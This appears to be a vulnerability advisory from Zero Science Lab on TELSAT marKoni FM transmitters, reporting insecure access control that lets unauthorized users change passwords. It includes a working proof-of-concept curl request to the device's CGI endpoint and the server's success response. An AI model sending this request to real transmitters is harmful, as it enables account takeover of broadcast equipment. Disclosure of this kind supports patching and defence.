Authored by LiquidWorm | Site zeroscience.mk

TELSAT marKoni FM Transmitter version 1.9.5 allows an unauthorized user to change passwords.



TELSAT marKoni FM Transmitter 1.9.5 Insecure Access Control Change Password


Vendor: TELSAT Srl
Product web page: https://www.markoni.it
Affected version: Markoni-D (Compact) FM Transmitters
Markoni-DH (Exciter+Amplifiers) FM Transmitters
Markoni-A (Analogue Modulator) FM Transmitters
Firmware: 1.9.5
1.9.3
1.5.9
1.4.6
1.3.9

Summary: Professional FM transmitters.

Desc: Unauthorized user could exploit this vulnerability to change
his/her password, potentially gaining unauthorized access to sensitive
information or performing actions beyond her/his designated permissions.

Tested on: GNU/Linux 3.10.53 (armv7l)
icorem6solox
lighttpd/1.4.33


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience


Advisory ID: ZSL-2024-5811
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5811.php


10.11.2023

--


PoC request of a user changing his own password.
Only admin can edit users. No permissions or Cookie check.

$ curl -s -H "Cookie: name=user-1702119917"
http://10.0.8.3:88/cgi-bin/ekafcgi.fcgi?OpCode=4&username=user&password=user&newpassword=t00tw00t

HTTP/1.1 200 OK
Content-type: text/html
Cache-control: no-cache
Set-Cookie: name=user-1702119917; max-age=315360000
Transfer-Encoding: chunked
Date: Sat, 9 Dec 2023 11:05:17 GMT
Server: lighttpd/1.4.33

oc=4&resp=0